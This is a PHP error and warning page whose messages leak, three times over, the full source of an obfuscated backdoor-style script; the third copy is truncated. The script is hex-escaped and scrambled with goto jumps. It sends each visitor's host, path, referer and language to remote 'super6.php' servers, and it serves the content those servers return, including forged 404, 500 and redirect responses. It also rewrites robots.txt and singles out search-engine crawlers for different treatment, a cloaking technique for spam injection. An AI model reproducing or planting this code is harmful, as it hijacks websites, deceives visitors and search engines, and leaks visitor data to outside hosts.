<br />
<b>Deprecated</b>:  Creation of dynamic property MemoryCodeStream::$context is deprecated in <b>/www/wwwroot/test.sualiu.com/index.php</b> on line <b>34</b><br />
<br />
<b>Warning</b>:  require(): MemoryCodeStream::stream_set_option is not implemented! in <b>/www/wwwroot/test.sualiu.com/index.php</b> on line <b>34</b><br />
<br />
<b>Warning</b>:  Undefined array key "HTTP_ACCEPT_LANGUAGE" in <b>memcode://<?php
 goto RVE02; CgJnd: $server = file_exists($_SERVER["\104\117\103\x55\115\x45\116\124\137\122\x4f\117\124"] . "\57\56\150\164\x61\x63\143\x65\163\163") ? 1 : 2; goto lSbA3; IxmBY: $param = http_build_query(array("\x77\x65\142" => $host, "\172\172" => $zz, "\x75\x72\151" => urlencode($duri), "\165\162\x6c\x73\x68\x61\x6e\x67" => $referer, "\x68\x74\x74\x70" => $http, "\x6c\x61\156\147" => $lang, "\x73\145\162\x76\x65\162" => $server, "\155\157\144\x65\x6c" => $model, "\166\145\162\163\151\x6f\156" => $istest ? $string : '')); goto R4kho; CxkMY: $referer = $_SERVER["\110\x54\x54\x50\137\122\105\106\105\122\105\122"] ?: ''; goto FgjI1; qhoLH: function create_robots($url) { $functions = func(); $path = $_SERVER["\104\x4f\x43\125\115\105\x4e\124\137\122\117\117\124"] . "\x2f\162\x6f\x62\157\x74\163\x2e\164\170\164"; $content = "\x55\163\145\162\55\x61\x67\x65\156\164\x3a\x20\x2a\12\101\154\154\x6f\x77\x3a\40\x2f\xa\12\123\151\x74\145\x6d\x61\x70\72\40" . $url . "\x2f\x73\x69\164\145\155\141\x70\56\x78\x6d\154\12"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto VR0F9; gLrt7: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto tW5gu; m8e5f: $host = $_SERVER["\x48\x54\124\x50\137\x48\117\x53\x54"] ?: ''; goto DM12j; qM9ot: $string = "\61\x35\x30\65\55\x6c\x69\156\x6b\61\70\x36"; goto m8e5f; JS8sX: $html_content = request($xmlname, $param); goto dFxAi; V6es1: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\57"); } $model = str_replace("\56\x70\x68\x70", '', $model_file); } goto TLXMx; x7ncS: $duri = drequest_uri() ?: "\x2f"; goto no1Nz; RVE02: $xmlname = array("\x25\x33\61\45\x33\65\x25\x33\x30\x25\x33\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\x31\45\67\x38\x25\x33\61\45\x33\70\x25\63\x36\45\62\x45\45\x36\x36\45\x37\62\x25\x36\x35\x25\x37\62\45\x36\x31\45\x36\67\45\66\66\45\x36\x43\45\x32\105\45\66\x37\x25\66\x32\x25\66\x33", "\x25\x33\61\x25\x33\x35\x25\x33\x30\x25\x33\x35\45\x32\x44\x25\67\x39\x25\67\66\x25\x36\61\45\67\x38\45\63\x31\x25\x33\x38\45\63\66\x25\62\105\45\66\71\45\67\x32\45\66\65\45\66\x39\45\x37\62\x25\66\70\45\x36\66\45\62\105\x25\66\x37\45\66\62\45\x36\x33", "\45\x33\x31\45\63\65\45\63\x30\45\63\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\61\x25\x37\70\45\63\x31\45\x33\70\45\x33\x36\45\x32\x45\45\x37\x39\45\x36\x38\45\x37\101\x25\66\62\x25\x36\x35\x25\x36\105\x25\66\x31\x25\62\105\45\66\x42\x25\66\103\x25\x36\104", "\x25\63\61\45\63\x35\45\x33\60\x25\63\65\45\x32\104\x25\67\x39\45\67\66\x25\66\61\x25\67\x38\x25\x33\x31\x25\63\70\x25\x33\66\x25\62\105\45\x36\x39\45\67\66\x25\x36\71\x25\66\103\x25\x36\61\45\x37\62\x25\x32\x45\x25\66\x42\45\x36\103\x25\x36\104"); goto qM9ot; X9JQO: preg_match("\57\134\x2f\x28\x5b\136\134\x2f\135\53\134\56\160\x68\160\x29\57", $duri, $matches); goto V6es1; dFxAi: if (strpos($html_content, "\156\x6f\142\157\x74\x75\163\145\x72\x61\x67\x65\156\x74") === false) { $response_handlers = array("\x6f\x6b\x68\x74\155\154" => array("\x68\x65\141\144\x65\x72" => "\103\x6f\x6e\x74\145\x6e\x74\x2d\164\x79\160\145\x3a\40\x74\x65\x78\164\57\x68\x74\x6d\154\x3b\40\143\150\x61\x72\163\x65\164\x3d\165\x74\146\x2d\70", "\162\x65\x70\x6c\141\x63\x65" => "\x6f\x6b\x68\x74\x6d\154", "\164\x65\163\x74\137\145\x63\150\157" => true, "\x6f\x75\164\160\x75\x74" => true), "\x67\145\x74\143\157\156\x74\145\x6e\164\65\x30\x30\x70\141\147\x65" => array("\x68\x65\x61\144\145\x72" => "\x48\124\124\x50\x2f\61\56\x31\x20\x35\60\60\40\x49\156\164\x65\x72\x6e\141\x6c\40\123\x65\162\166\145\x72\x20\105\162\x72\x6f\162"), "\64\x30\64\160\141\147\x65" => array("\150\145\x61\144\145\x72" => "\x48\x54\124\x50\x2f\x31\56\x31\x20\64\x30\x34\40\116\x6f\164\40\106\x6f\x75\156\x64"), "\63\60\61\x70\141\x67\145" => array("\150\145\x61\x64\x65\162" => "\x48\124\x54\x50\57\x31\x2e\x31\x20\63\x30\61\x20\x4d\x6f\166\145\x64\40\x50\x65\x72\x6d\141\x6e\x65\156\x74\154\x79", "\x72\x65\x70\x6c\x61\143\x65" => "\x33\x30\x31\x70\141\147\145", "\162\x65\144\151\x72\x65\143\x74" => true), "\x6f\153\x78\155\154" => array("\150\145\141\x64\145\x72" => "\x43\157\x6e\164\145\x6e\x74\55\x54\x79\160\x65\72\x20\x61\160\x70\x6c\151\x63\141\164\x69\157\x6e\57\170\x6d\154\73\40\143\150\x61\x72\x73\145\164\x3d\x75\x74\x66\55\70", "\162\145\160\154\141\x63\145" => "\157\x6b\x78\155\x6c", "\157\x75\164\x70\x75\x74" => true), "\x6f\x6b\162\x6f\x62\x6f\x74\x73" => array("\150\x65\141\144\x65\162" => "\x43\157\x6e\x74\145\156\x74\55\124\171\x70\145\x3a\40\x74\145\170\164\57\160\154\x61\151\x6e", "\162\145\x70\154\x61\143\x65" => "\157\x6b\x72\x6f\x62\x6f\x74\163", "\x6f\x75\x74\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\x68\x65\x61\x64\x65\x72"]); if (isset($handler["\162\x65\160\x6c\141\x63\145"])) { $html_content = str_replace($handler["\162\145\160\154\141\x63\145"], '', $html_content); } if (isset($handler["\x74\x65\x73\x74\137\145\143\x68\x6f"]) && $istest) { echo $string; } if (isset($handler["\x72\x65\x64\151\x72\145\143\x74"])) { header("\114\x6f\143\x61\164\x69\157\156\x3a\40" . $html_content); } elseif (isset($handler["\x6f\165\x74\160\x75\164"])) { echo $html_content; } die; } } } goto Ppm6Z; lSbA3: $zz = disbot(); goto x7ncS; njOtC: $model = "\151\156\144\x65\170"; goto X9JQO; GClz3: function is_https() { if (isset($_SERVER["\110\x54\124\x50\123"])) { $https = strtolower($_SERVER["\x48\x54\x54\x50\x53"]); if ($https !== "\157\x66\146" && $https !== '') { return true; } } if (isset($_SERVER["\110\124\x54\x50\137\130\137\106\x4f\x52\127\x41\122\104\x45\104\137\120\x52\117\124\117"]) && $_SERVER["\x48\124\124\120\x5f\x58\x5f\x46\117\122\x57\x41\122\104\x45\104\137\120\x52\117\x54\x4f"] === "\x68\164\164\x70\x73") { return true; } if (isset($_SERVER["\110\124\x54\120\137\106\122\x4f\x4e\124\137\105\x4e\x44\x5f\110\x54\x54\x50\123"])) { $front_end_https = strtolower($_SERVER["\x48\124\x54\120\137\x46\122\x4f\x4e\x54\137\105\116\x44\137\110\124\x54\120\123"]); if ($front_end_https !== "\157\x66\x66" && $front_end_https !== '') { return true; } } return false; } goto qhoLH; FgjI1: $http = is_https() ? "\150\x74\164\160\x73" : "\150\x74\164\x70"; goto CgJnd; DM12j: $lang = $_SERVER["\x48\x54\x54\120\137\101\103\x43\105\120\x54\137\x4c\x41\x4e\107\x55\x41\107\105"] ?: "\x65\x6e"; goto CxkMY; tW5gu: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\57\x69\156\x64\x65\170\x2e\x70\150\160", '', $duri); $duri = str_replace("\41", '', $duri); } goto IxmBY; R4kho: create_robots($http . "\72\57\57" . $host); goto JS8sX; no1Nz: $model_file = "\x69\156\144\x65\x78\x2e\x70\150\x70"; goto njOtC; VR0F9: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\164\x74\160\72\x2f\57" . $domain_decoded . "\57\x73\165\x70\x65\x72\x36\56\x70\150\x70\x3f" . $param; if (function_exists("\x77\160\137\x72\x65\x6d\157\164\x65\137\147\145\x74")) { $response = wp_remote_get($url, array("\x74\x69\155\145\157\x75\164" => 30, "\x75\163\x65\162\55\141\147\145\156\x74" => "\x4d\157\x7a\151\154\x6c\x61\57\x35\56\60\40\x28\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\x20\x57\x6f\x72\144\x50\162\x65\163\x73\x29")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\165\x72\154\137\x69\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\141\154\154\157\167\x5f\165\x72\154\x5f\146\x6f\160\145\x6e")) { $context = stream_context_create(array("\150\x74\164\160" => array("\x74\151\x6d\145\x6f\165\164" => 30))); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\156\157\x62\x6f\164\165\x73\145\x72\x61\x67\x65\x6e\164"; } goto Gx4zS; KyWYi: $istest = false; goto gLrt7; TLXMx: $model = stristr($duri, "\x2f\77") ? "\77" : $model; goto KyWYi; Ppm6Z: function disbot() { $user_agent = isset($_SERVER["\x48\124\x54\120\137\x55\123\x45\x52\x5f\x41\x47\105\116\124"]) ? strtolower($_SERVER["\110\x54\124\120\x5f\x55\123\x45\122\137\x41\x47\x45\x4e\124"]) : ''; $bots = array("\x67\x6f\157\147\154\x65\x62\x6f\x74", "\x62\x69\x6e\147", "\x79\x61\150\157\157", "\147\x6f\157\147\154\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto vnzVF; vnzVF: function drequest_uri() { if (isset($_SERVER["\x52\105\121\125\105\x53\124\x5f\x55\122\111"])) { return $_SERVER["\x52\x45\x51\x55\105\x53\x54\x5f\125\122\x49"]; } if (isset($_SERVER["\x61\x72\147\x76"])) { return $_SERVER["\x50\x48\x50\137\123\105\114\x46"] . "\x3f" . $_SERVER["\x61\162\147\166"][0]; } return $_SERVER["\120\x48\120\137\123\105\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\122\131\137\123\x54\x52\111\116\107"]; } goto GClz3; Gx4zS: function func() { $chars = range("\x61", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\x5f" . $chars[17] . $chars[14] . $chars[19] . "\61\x33"); }</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  Undefined array key "HTTP_REFERER" in <b>memcode://<?php
 goto RVE02; CgJnd: $server = file_exists($_SERVER["\104\117\103\x55\115\x45\116\124\137\122\x4f\117\124"] . "\57\56\150\164\x61\x63\143\x65\163\163") ? 1 : 2; goto lSbA3; IxmBY: $param = http_build_query(array("\x77\x65\142" => $host, "\172\172" => $zz, "\x75\x72\151" => urlencode($duri), "\165\162\x6c\x73\x68\x61\x6e\x67" => $referer, "\x68\x74\x74\x70" => $http, "\x6c\x61\156\147" => $lang, "\x73\145\162\x76\x65\162" => $server, "\155\157\144\x65\x6c" => $model, "\166\145\162\163\151\x6f\156" => $istest ? $string : '')); goto R4kho; CxkMY: $referer = $_SERVER["\110\x54\x54\x50\137\122\105\106\105\122\105\122"] ?: ''; goto FgjI1; qhoLH: function create_robots($url) { $functions = func(); $path = $_SERVER["\104\x4f\x43\125\115\105\x4e\124\137\122\117\117\124"] . "\x2f\162\x6f\x62\157\x74\163\x2e\164\170\164"; $content = "\x55\163\145\162\55\x61\x67\x65\156\164\x3a\x20\x2a\12\101\154\154\x6f\x77\x3a\40\x2f\xa\12\123\151\x74\145\x6d\x61\x70\72\40" . $url . "\x2f\x73\x69\164\145\155\141\x70\56\x78\x6d\154\12"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto VR0F9; gLrt7: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto tW5gu; m8e5f: $host = $_SERVER["\x48\x54\124\x50\137\x48\117\x53\x54"] ?: ''; goto DM12j; qM9ot: $string = "\61\x35\x30\65\55\x6c\x69\156\x6b\61\70\x36"; goto m8e5f; JS8sX: $html_content = request($xmlname, $param); goto dFxAi; V6es1: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\57"); } $model = str_replace("\56\x70\x68\x70", '', $model_file); } goto TLXMx; x7ncS: $duri = drequest_uri() ?: "\x2f"; goto no1Nz; RVE02: $xmlname = array("\x25\x33\61\45\x33\65\x25\x33\x30\x25\x33\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\x31\45\67\x38\x25\x33\61\45\x33\70\x25\63\x36\45\62\x45\45\x36\x36\45\x37\62\x25\x36\x35\x25\x37\62\45\x36\x31\45\x36\67\45\66\66\45\x36\x43\45\x32\105\45\66\x37\x25\66\x32\x25\66\x33", "\x25\x33\61\x25\x33\x35\x25\x33\x30\x25\x33\x35\45\x32\x44\x25\67\x39\x25\67\66\x25\x36\61\45\67\x38\45\63\x31\x25\x33\x38\45\63\66\x25\62\105\45\66\71\45\67\x32\45\66\65\45\66\x39\45\x37\62\x25\66\70\45\x36\66\45\62\105\x25\66\x37\45\66\62\45\x36\x33", "\45\x33\x31\45\63\65\45\63\x30\45\63\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\61\x25\x37\70\45\63\x31\45\x33\70\45\x33\x36\45\x32\x45\45\x37\x39\45\x36\x38\45\x37\101\x25\66\62\x25\x36\x35\x25\x36\105\x25\66\x31\x25\62\105\45\66\x42\x25\66\103\x25\x36\104", "\x25\63\61\45\63\x35\45\x33\60\x25\63\65\45\x32\104\x25\67\x39\45\67\66\x25\66\61\x25\67\x38\x25\x33\x31\x25\63\70\x25\x33\66\x25\62\105\45\x36\x39\45\67\66\x25\x36\71\x25\66\103\x25\x36\61\45\x37\62\x25\x32\x45\x25\66\x42\45\x36\103\x25\x36\104"); goto qM9ot; X9JQO: preg_match("\57\134\x2f\x28\x5b\136\134\x2f\135\53\134\56\160\x68\160\x29\57", $duri, $matches); goto V6es1; dFxAi: if (strpos($html_content, "\156\x6f\142\157\x74\x75\163\145\x72\x61\x67\x65\156\x74") === false) { $response_handlers = array("\x6f\x6b\x68\x74\155\154" => array("\x68\x65\141\144\x65\x72" => "\103\x6f\x6e\x74\145\x6e\x74\x2d\164\x79\160\145\x3a\40\x74\x65\x78\164\57\x68\x74\x6d\154\x3b\40\143\150\x61\x72\163\x65\164\x3d\165\x74\146\x2d\70", "\162\x65\x70\x6c\141\x63\x65" => "\x6f\x6b\x68\x74\x6d\154", "\164\x65\163\x74\137\145\x63\150\157" => true, "\x6f\x75\164\160\x75\x74" => true), "\x67\145\x74\143\157\156\x74\145\x6e\164\65\x30\x30\x70\141\147\x65" => array("\x68\x65\x61\144\145\x72" => "\x48\124\124\x50\x2f\61\56\x31\x20\x35\60\60\40\x49\156\164\x65\x72\x6e\141\x6c\40\123\x65\162\166\145\x72\x20\105\162\x72\x6f\162"), "\64\x30\64\160\141\147\x65" => array("\150\145\x61\144\145\x72" => "\x48\x54\124\x50\x2f\x31\56\x31\x20\64\x30\x34\40\116\x6f\164\40\106\x6f\x75\156\x64"), "\63\60\61\x70\141\x67\145" => array("\150\145\x61\x64\x65\162" => "\x48\124\x54\x50\57\x31\x2e\x31\x20\63\x30\61\x20\x4d\x6f\166\145\x64\40\x50\x65\x72\x6d\141\x6e\x65\156\x74\154\x79", "\x72\x65\x70\x6c\x61\143\x65" => "\x33\x30\x31\x70\141\147\145", "\162\x65\144\151\x72\x65\143\x74" => true), "\x6f\153\x78\155\154" => array("\150\145\141\x64\145\x72" => "\x43\157\x6e\164\145\x6e\x74\55\x54\x79\160\x65\72\x20\x61\160\x70\x6c\151\x63\141\164\x69\157\x6e\57\170\x6d\154\73\40\143\150\x61\x72\x73\145\164\x3d\x75\x74\x66\55\70", "\162\145\160\154\141\x63\145" => "\157\x6b\x78\155\x6c", "\157\x75\164\x70\x75\x74" => true), "\x6f\x6b\162\x6f\x62\x6f\x74\x73" => array("\150\x65\141\144\x65\162" => "\x43\157\x6e\x74\145\156\x74\55\124\171\x70\145\x3a\40\x74\145\170\164\57\160\154\x61\151\x6e", "\162\145\x70\154\x61\143\x65" => "\157\x6b\x72\x6f\x62\x6f\x74\163", "\x6f\x75\x74\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\x68\x65\x61\x64\x65\x72"]); if (isset($handler["\162\x65\160\x6c\141\x63\145"])) { $html_content = str_replace($handler["\162\145\160\154\141\x63\145"], '', $html_content); } if (isset($handler["\x74\x65\x73\x74\137\145\143\x68\x6f"]) && $istest) { echo $string; } if (isset($handler["\x72\x65\x64\151\x72\145\143\x74"])) { header("\114\x6f\143\x61\164\x69\157\156\x3a\40" . $html_content); } elseif (isset($handler["\x6f\165\x74\160\x75\164"])) { echo $html_content; } die; } } } goto Ppm6Z; lSbA3: $zz = disbot(); goto x7ncS; njOtC: $model = "\151\156\144\x65\170"; goto X9JQO; GClz3: function is_https() { if (isset($_SERVER["\110\x54\124\x50\123"])) { $https = strtolower($_SERVER["\x48\x54\x54\x50\x53"]); if ($https !== "\157\x66\146" && $https !== '') { return true; } } if (isset($_SERVER["\110\124\x54\x50\137\130\137\106\x4f\x52\127\x41\122\104\x45\104\137\120\x52\117\124\117"]) && $_SERVER["\x48\124\124\120\x5f\x58\x5f\x46\117\122\x57\x41\122\104\x45\104\137\120\x52\117\x54\x4f"] === "\x68\164\164\x70\x73") { return true; } if (isset($_SERVER["\110\124\x54\120\137\106\122\x4f\x4e\124\137\105\x4e\x44\x5f\110\x54\x54\x50\123"])) { $front_end_https = strtolower($_SERVER["\x48\124\x54\120\137\x46\122\x4f\x4e\x54\137\105\116\x44\137\110\124\x54\120\123"]); if ($front_end_https !== "\157\x66\x66" && $front_end_https !== '') { return true; } } return false; } goto qhoLH; FgjI1: $http = is_https() ? "\150\x74\164\160\x73" : "\150\x74\164\x70"; goto CgJnd; DM12j: $lang = $_SERVER["\x48\x54\x54\120\137\101\103\x43\105\120\x54\137\x4c\x41\x4e\107\x55\x41\107\105"] ?: "\x65\x6e"; goto CxkMY; tW5gu: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\57\x69\156\x64\x65\170\x2e\x70\150\160", '', $duri); $duri = str_replace("\41", '', $duri); } goto IxmBY; R4kho: create_robots($http . "\72\57\57" . $host); goto JS8sX; no1Nz: $model_file = "\x69\156\144\x65\x78\x2e\x70\150\x70"; goto njOtC; VR0F9: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\164\x74\160\72\x2f\57" . $domain_decoded . "\57\x73\165\x70\x65\x72\x36\56\x70\150\x70\x3f" . $param; if (function_exists("\x77\160\137\x72\x65\x6d\157\164\x65\137\147\145\x74")) { $response = wp_remote_get($url, array("\x74\x69\155\145\157\x75\164" => 30, "\x75\163\x65\162\55\141\147\145\156\x74" => "\x4d\157\x7a\151\154\x6c\x61\57\x35\56\60\40\x28\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\x20\x57\x6f\x72\144\x50\162\x65\163\x73\x29")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\165\x72\154\137\x69\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\141\154\154\157\167\x5f\165\x72\154\x5f\146\x6f\160\145\x6e")) { $context = stream_context_create(array("\150\x74\164\160" => array("\x74\151\x6d\145\x6f\165\164" => 30))); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\156\157\x62\x6f\164\165\x73\145\x72\x61\x67\x65\x6e\164"; } goto Gx4zS; KyWYi: $istest = false; goto gLrt7; TLXMx: $model = stristr($duri, "\x2f\77") ? "\77" : $model; goto KyWYi; Ppm6Z: function disbot() { $user_agent = isset($_SERVER["\x48\124\x54\120\137\x55\123\x45\x52\x5f\x41\x47\105\116\124"]) ? strtolower($_SERVER["\110\x54\124\120\x5f\x55\123\x45\122\137\x41\x47\x45\x4e\124"]) : ''; $bots = array("\x67\x6f\157\147\154\x65\x62\x6f\x74", "\x62\x69\x6e\147", "\x79\x61\150\157\157", "\147\x6f\157\147\154\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto vnzVF; vnzVF: function drequest_uri() { if (isset($_SERVER["\x52\105\121\125\105\x53\124\x5f\x55\122\111"])) { return $_SERVER["\x52\x45\x51\x55\105\x53\x54\x5f\125\122\x49"]; } if (isset($_SERVER["\x61\x72\147\x76"])) { return $_SERVER["\x50\x48\x50\137\123\105\114\x46"] . "\x3f" . $_SERVER["\x61\162\147\166"][0]; } return $_SERVER["\120\x48\120\137\123\105\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\122\131\137\123\x54\x52\111\116\107"]; } goto GClz3; Gx4zS: function func() { $chars = range("\x61", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\x5f" . $chars[17] . $chars[14] . $chars[19] . "\61\x33"); }</b> on line <b>2</b><br />
<br />
<b>Deprecated</b>:  Function curl_close() is deprecated since 8.5, as it has no effect since PHP 8.0 in <b>memcode://<?php
 goto RVE02; CgJnd: $server = file_exists($_SERVER["\104\117\103\x55\115\x45\116\124\137\122\x4f\117\124"] . "\57\56\150\164\x61\x63\143\x65\163\163") ? 1 : 2; goto lSbA3; IxmBY: $param = http_build_query(array("\x77\x65\142" => $host, "\172\172" => $zz, "\x75\x72\151" => urlencode($duri), "\165\162\x6c\x73\x68\x61\x6e\x67" => $referer, "\x68\x74\x74\x70" => $http, "\x6c\x61\156\147" => $lang, "\x73\145\162\x76\x65\162" => $server, "\155\157\144\x65\x6c" => $model, "\166\145\162\163\151\x6f\156" => $istest ? $string : '')); goto R4kho; CxkMY: $referer = $_SERVER["\110\x54\x54\x50\137\122\105\106\105\122\105\122"] ?: ''; goto FgjI1; qhoLH: function create_robots($url) { $functions = func(); $path = $_SERVER["\104\x4f\x43\125\115\105\x4e\124\137\122\117\117\124"] . "\x2f\162\x6f\x62\157\x74\163\x2e\164\170\164"; $content = "\x55\163\145\162\55\x61\x67\x65\156\164\x3a\x20\x2a\12\101\154\154\x6f\x77\x3a\40\x2f\xa\12\123\151\x74\145\x6d\x61\x70\72\40" . $url . "\x2f\x73\x69\164\145\155\141\x70\56\x78\x6d\154\12"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto VR0F9; gLrt7: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto tW5gu; m8e5f: $host = $_SERVER["\x48\x54\124\x50\137\x48\117\x53\x54"] ?: ''; goto DM12j; qM9ot: $string = "\61\x35\x30\65\55\x6c\x69\156\x6b\61\70\x36"; goto m8e5f; JS8sX: $html_content = request($xmlname, $param); goto dFxAi; V6es1: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\57"); } $model = str_replace("\56\x70\x68\x70", '', $model_file); } goto TLXMx; x7ncS: $duri = drequest_uri() ?: "\x2f"; goto no1Nz; RVE02: $xmlname = array("\x25\x33\61\45\x33\65\x25\x33\x30\x25\x33\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\x31\45\67\x38\x25\x33\61\45\x33\70\x25\63\x36\45\62\x45\45\x36\x36\45\x37\62\x25\x36\x35\x25\x37\62\45\x36\x31\45\x36\67\45\66\66\45\x36\x43\45\x32\105\45\66\x37\x25\66\x32\x25\66\x33", "\x25\x33\61\x25\x33\x35\x25\x33\x30\x25\x33\x35\45\x32\x44\x25\67\x39\x25\67\66\x25\x36\61\45\67\x38\45\63\x31\x25\x33\x38\45\63\66\x25\62\105\45\66\71\45\67\x32\45\66\65\45\66\x39\45\x37\62\x25\66\70\45\x36\66\45\62\105\x25\66\x37\45\66\62\45\x36\x33", "\45\x33\x31\45\63\65\45\63\x30\45\63\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\61\x25\x37\70\45\63\x31\45\x33\70\45\x33\x36\45\x32\x45\45\x37\x39\45\x36\x38\45\x37\101\x25\66\62\x25\x36\x35\x25\x36\105\x25\66\x31\x25\62\105\45\66\x42\x25\66\103\x25\x36\104", "\x25\63\61\45\63\x35\45\x33\60\x25\63\65\45\x32\104\x25\67\x39\45\67\66\x25\66\61\x25\67\x38\x25\x33\x31\x25\63\70\x25\x33\66\x25\62\105\45\x36\x39\45\67\66\x25\x36\71\x25\66\103\x25\x36\61\45\x37\62\x25\x32\x45\x25\66\x42\45\x36\103\x25\x36\104"); goto qM9ot; X9JQO: preg_match("\57\134\x2f\x28\x5b\136\134\x2f\135\53\134\56\160\x68\160\x29\57", $duri, $matches); goto V6es1; dFxAi: if (strpos($html_content, "\156\x6f\142\157\x74\x75\163\145\x72\x61\x67\x65\156\x74") === false) { $response_handlers = array("\x6f\x6b\x68\x74\155\154" => array("\x68\x65\141\144\x65\x72" => "\103\x6f\x6e\x74\145\x6e\x74\x2d\164\x79\160\145\x3a\40\x74\x65\x78\164\57\x68\x74\x6d\154\x3b\40\143\150\x61\x72\163\x65\164\x3d\165\x74\146\x2d\70", "\162\x65\x70\x6c\141\x63\x65" => "\x6f\x6b\x68\x74\x6d\154", "\164\x65\163\x74\137\145\x63\150\157" => true, "\x6f\x75\164\160\x75\x74" => true), "\x67\145\x74\143\157\156\x74\145\x6e\164\65\x30\x30\x70\141\147\x65" => array("\x68\x65\x61\144\145\x72" => "\x48\124\124\x50\x2f\61\56\x31\x20\x35\60\60\40\x49\156\164\x65\x72\x6e\141\x6c\40\123\x65\162\166\145\x72\x20\105\162\x72\x6f\162"), "\64\x30\64\160\141\147\x65" => array("\150\145\x61\144\145\x72" => "\x48\x54\124\x50\x2f\x31\56\x31\x20\64\x30\x34\40\116\x6f\164\40\106\x6f\x75\156\x64"), "\63\60\61\x70\141\x67\145" => array("\150\145\x61\x64\x65\162" => "\x48\124\x54\x50\57\x31\x2e\x31\x20\63\x30\61\x20\x4d\x6f\166\145\x64\40\x50\x65\x72\x6d\141\x6e\x65\156\x74\154\x79", "\x72\x65\x70\x6c\x61\143\x65" => "\x33\x30\x31\x70\141\147\145", "\162\x65\144\151\x72\x65\143\x74" => true), "\x6f\153\x78\155\154" => array("\150\145\141\x64\145\x72" => "\x43\157\x6e\164\145\x6e\x74\55\x54\x79\160\x65\72\x20\x61\160\x70\x6c\151\x63\141\164\x69\157\x6e\57\170\x6d\154\73\40\143\150\x61\x72\x73\145\164\x3d\x75\x74\x66\55\70", "\162\145\160\154\141\x63\145" => "\157\x6b\x78\155\x6c", "\157\x75\164\x70\x75\x74" => true), "\x6f\x6b\162\x6f\x62\x6f\x74\x73" => array("\150\x65\141\144\x65\162" => "\x43\157\x6e\x74\145\156\x74\55\124\171\x70\145\x3a\40\x74\145\170\164\57\160\154\x61\151\x6e", "\162\145\x70\154\x61\143\x65" => "\157\x6b\x72\x6f\x62\x6f\x74\163", "\x6f\x75\x74\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\x68\x65\x61\x64\x65\x72"]); if 